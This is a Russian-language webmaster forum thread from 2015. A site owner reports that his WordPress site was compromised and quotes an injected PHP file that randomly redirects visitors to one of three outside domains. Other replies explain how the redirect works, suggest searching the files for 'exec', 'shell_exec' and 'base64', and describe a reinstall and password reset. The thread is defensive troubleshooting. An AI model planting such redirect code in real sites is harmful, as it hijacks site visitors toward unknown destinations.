Заражен гс-к wp 30 Опции темы
Старый 11.10.2015, 23:20
  #1
valsof
 
Регистрация: 26.02.2012
Сообщений: 423

Заражен гс-к wp 30
Ситуация следующая: есть у меня гс-к на вп под адмитад, висит на камале впс вместе с еще двумя под прон. Три дня назад он у меня упал с белой страничкой, сегодня начал лечить стандартным способом и вылезший из небытия каспер вдруг обнаружил из 2250 файлов, аж 1700 зараженных...

Два других сайта не заражены. Соб-но вопрос: куда капать? Сторонних плагинов нет, сервисы никакие не используются. Файлы движка не правились, но добавилось десяток новых evening.php, exactly.php, fine.php и тд (невидимки прям, .лять) в основном с содержанием

<?php
$target_urls = array (
'http://com-czd.net/?a=314759&c=wl_con&s=ALL',
'http://com-h8g.net/?a=314759&c=wl_con&s=ALL',
'http://com-tii.net/?a=314759&c=wl_con&s=ALL',
);
$n = mt_rand(0,count($target_urls)-1);
$rand_url=$target_urls[$n];
?>
<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">

Остальные стандартное перенаправление и адблоки, а вот как эта хрень работает мне не понятно.
Нравится 0   Не нравится 0
Пожаловаться на это сообщение 0  
Старый 12.10.2015, 08:44
  #2
Матрос
 
Аватар для Матрос
Регистрация: 26.03.2011
Сообщений: 1,395

Скорее всего у вас эксплойт где-то на сайте. Первое что приходит в голову - плагины. Эксплойт может быть залит и с картинкой, и с любым файлом. Возможно стянут пароль от админки сайта. Тот кто ломает через ФТП не ограничиться одним сайтом. Тогда, как правило, заражается все что есть в аккаунте.

Где-то на форуме я создавал тему о том как найти эксплойт на сайте. В двух словах - надо сохранить все файлы на комп, и искать в файлах фрагменты "exec", "shell_exec", "base64".

Обычные шаблоны и плагины с официального хранилища ВП не содержат таких элементов. Если найдете - валите все нафиг.

Если шаблон чистый, тогда проще - удаляете все файлы кроме wp-include/uploads/ поскольку это самая большая папка. И устанавливаете НОВЫЙ чистый ВП, потом заливаете свой диз, плагины и меняете все пароли. в том числе и на базу данных. получить пароль из файла wp-config При наличии "дверей на сайт" не составит труда. Зачастую это первое что делают воры.
Нравится 0   Не нравится 0
Пожаловаться на это сообщение 0  
Старый 12.10.2015, 08:46
  #3
Матрос
 
Аватар для Матрос
Регистрация: 26.03.2011
Сообщений: 1,395

Сообщение от valsof Посмотреть сообщение
а вот как эта хрень работает мне не понятно
Очень просто - рандомным образом выбирает из массива урлов любой и перенаправляет посетителей на него. Это могут быть посетители с мобильных,или с поисковиков. надо смотреть htaccess. И какая дата создания этих зло-файлов?
Нравится 0   Не нравится 0
Пожаловаться на это сообщение 0  
Старый 12.10.2015, 17:16
  #4
valsof
 
Регистрация: 26.02.2012
Сообщений: 423

htaccess чистый, адреса мёртвые, поэтому мне не понятно как происходит редирект. Червь действует на уровне одного домена, иначе были бы заражены все сайты и трафика на них на неск порядков больше.

Сайт я почистил. Каспер нашёл таки 18 php файлов с бэкдорами и 2 png с подгрузкой. Сейчас при заходе на сайт Каспер блокирует мне все jsники, хотя все онлайн антивирусы ничего не находят. Попробую ещё сделать поиск в файлах, как вы предложили.
Нравится 0   Не нравится 0
Пожаловаться на это сообщение 0  
Ответить с цитированием

 
 
 

Метки
wordpress, взлом, метка3


Здесь присутствуют: 1 (пользователей: 0, гостей: 1)
 
Опции темы

Быстрый переход


Текущее время: 22:31. Часовой пояс GMT +3.